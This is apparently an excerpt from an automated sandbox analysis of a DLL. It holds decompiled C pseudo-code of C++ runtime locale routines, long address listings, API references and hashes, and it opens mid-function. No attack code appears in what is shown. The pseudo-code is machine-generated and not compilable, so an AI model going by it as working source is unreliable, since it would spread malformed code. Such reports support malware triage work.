														} else {
															_t802 = _t822;
															goto L26;
														}
													}
												} else {
													_t801 =  *(_t858 - 0x10);
													 *(_t858 - 0x10) = _t801;
													 *(_t858 - 4) = 1;
													E6E206FD3(__eflags, _t801);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t801 + 4))))();
													 *0x6e2c6db8 = _t801;
													goto L19;
												}
											} else {
												_t801 = _t821;
												goto L19;
											}
										}
									} else {
										_t800 =  *(_t858 - 0x10);
										 *(_t858 - 0x10) = _t800;
										 *(_t858 - 4) = 1;
										E6E206FD3(__eflags, _t800);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t800 + 4))))();
										 *0x6e2c6de8 = _t800;
										goto L12;
									}
								} else {
									_t800 = _t820;
									goto L12;
								}
							}
						} else {
							_t799 =  *(_t858 - 0x10);
							 *(_t858 - 0x10) = _t799;
							 *(_t858 - 4) = 1;
							E6E206FD3(__eflags, _t799);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t799 + 4))))();
							 *0x6e2c6dd4 = _t799;
							goto L5;
						}
					} else {
						_t799 = _t819;
						goto L5;
					}
				}
			}































































                          0x6e20f0dd
                          0x6e20f0dd
                          0x6e20f0e4
                          0x6e20f0ee
                          0x6e20f0f3
                          0x6e20f0fe
                          0x6e20f102
                          0x6e20f105
                          0x6e20f10a
                          0x6e20f10e
                          0x6e20f113
                          0x6e20f117
                          0x6e20f15c
                          0x6e20f15f
                          0x6e20f16b
                          0x6e20f119
                          0x6e20f11b
                          0x6e20f121
                          0x6e20f127
                          0x6e20f12f
                          0x6e20f132
                          0x6e20f16f
                          0x6e20f17d
                          0x6e20f182
                          0x6e20f18a
                          0x6e20f194
                          0x6e20f199
                          0x6e20f1a4
                          0x6e20f1a8
                          0x6e20f1ab
                          0x6e20f1b0
                          0x6e20f1b9
                          0x6e20f1bb
                          0x6e20f1bd
                          0x6e20f202
                          0x6e20f205
                          0x6e20f211
                          0x6e20f1bf
                          0x6e20f1bf
                          0x6e20f1c1
                          0x6e20f1c7
                          0x6e20f1cd
                          0x6e20f1d5
                          0x6e20f1d8
                          0x6e20f215
                          0x6e20f223
                          0x6e20f228
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25f
                          0x6e20f261
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1
                          0x6e20f134
                          0x6e20f134
                          0x6e20f137
                          0x6e20f13b
                          0x6e20f13f
                          0x6e20f14c
                          0x6e20f154
                          0x6e20f156
                          0x00000000
                          0x6e20f156
                          0x6e20f11d
                          0x6e20f11d
                          0x00000000
                          0x6e20f11d
                          0x6e20f11b

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F0E4
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F0EE
                          • int.LIBCPMT ref: 6E20F105
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • ctype.LIBCPMT ref: 6E20F128
                          • std::_Facet_Register.LIBCPMT ref: 6E20F13F
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F15F
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F17D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
                          • String ID: (k,n
                          • API String ID: 1394824916-2474335229
                          • Opcode ID: cc28697564a2c7203ff979a8fb5b774c98dc29d3b58340312fcd4848b9827f16
                          • Instruction ID: 0c45d773f348144a53aee096c385ca3720259a60b4694af22e905baab13ee6b9
                          • Opcode Fuzzy Hash: cc28697564a2c7203ff979a8fb5b774c98dc29d3b58340312fcd4848b9827f16
                          • Instruction Fuzzy Hash: 7011C67591052DDBCF01EBE4C894AEEB7BBAF45B15F240908E510AB3D0DB749A44C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24E984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 74%
                          			E6E24E984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6e2c506c; // 0x5cc08226
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6E24D5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6E24DE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6E24F26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6E2491A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6E242188();
									asm("int3");
									_t171 =  *0x6e2c76f0; // 0x3576920
									 *0x6e2c5108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6e2c51c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6e2c51ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6E24DB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6E256102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6e270ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6E221C3C( &_v528,  *0x6e2c51e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6e270de8; // 0x6e20815c
									 *0x6e26a26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6e2c52b0;
										if(_t233 != 0x6e2c52b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6E24CBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6E24CBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6E24CBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6E24CBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6E24CBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6E21F8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

























































                          0x6e24e987
                          0x6e24e98f
                          0x6e24e996
                          0x6e24e999
                          0x6e24e99a
                          0x6e24e99d
                          0x6e24e9a1
                          0x6e24e9a2
                          0x6e24e9a5
                          0x6e24e9b5
                          0x6e24e9d8
                          0x6e24e9dd
                          0x6e24e9e2
                          0x6e24e9f7
                          0x6e24e9fa
                          0x6e24e9fa
                          0x6e24e9fd
                          0x6e24ea03
                          0x6e24ea09
                          0x6e24ea0c
                          0x6e24ea0e
                          0x6e24ea11
                          0x6e24ea18
                          0x6e24ea1b
                          0x6e24ea21
                          0x00000000
                          0x00000000
                          0x6e24ea23
                          0x6e24ea27
                          0x6e24ea50
                          0x6e24ea50
                          0x6e24ea29
                          0x6e24ea29
                          0x6e24ea2d
                          0x6e24ea31
                          0x6e24ea38
                          0x6e24ea3e
                          0x00000000
                          0x6e24ea40
                          0x6e24ea40
                          0x6e24ea43
                          0x6e24ea46
                          0x6e24ea4e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e24ea4e
                          0x6e24ea3e
                          0x6e24ea5d
                          0x6e24ea5d
                          0x6e24ea5f
                          0x6e24ea65
                          0x6e24ea6b
                          0x6e24ea6e
                          0x6e24ea6e
                          0x6e24ea71
                          0x6e24ea74
                          0x6e24ea74
                          0x6e24ea84
                          0x6e24ea92
                          0x6e24ea97
                          0x6e24ea9e
                          0x6e24eaa0
                          0x00000000
                          0x6e24eaa6
                          0x6e24eaac
                          0x6e24eab2
                          0x6e24eab9
                          0x6e24eabf
                          0x6e24eac2
                          0x6e24eac8
                          0x6e24ead5
                          0x6e24eadc
                          0x6e24eae1
                          0x6e24eae4
                          0x6e24eae6
                          0x6e24ed3f
                          0x6e24ed45
                          0x6e24ed46
                          0x6e24ed47
                          0x6e24ed48
                          0x6e24ed49
                          0x6e24ed4a
                          0x6e24ed4f
                          0x6e24ed50
                          0x6e24ed5b
                          0x6e24ed63
                          0x6e24ed69
                          0x6e24ed6c
                          0x6e24ed71
                          0x6e24eaec
                          0x6e24eaec
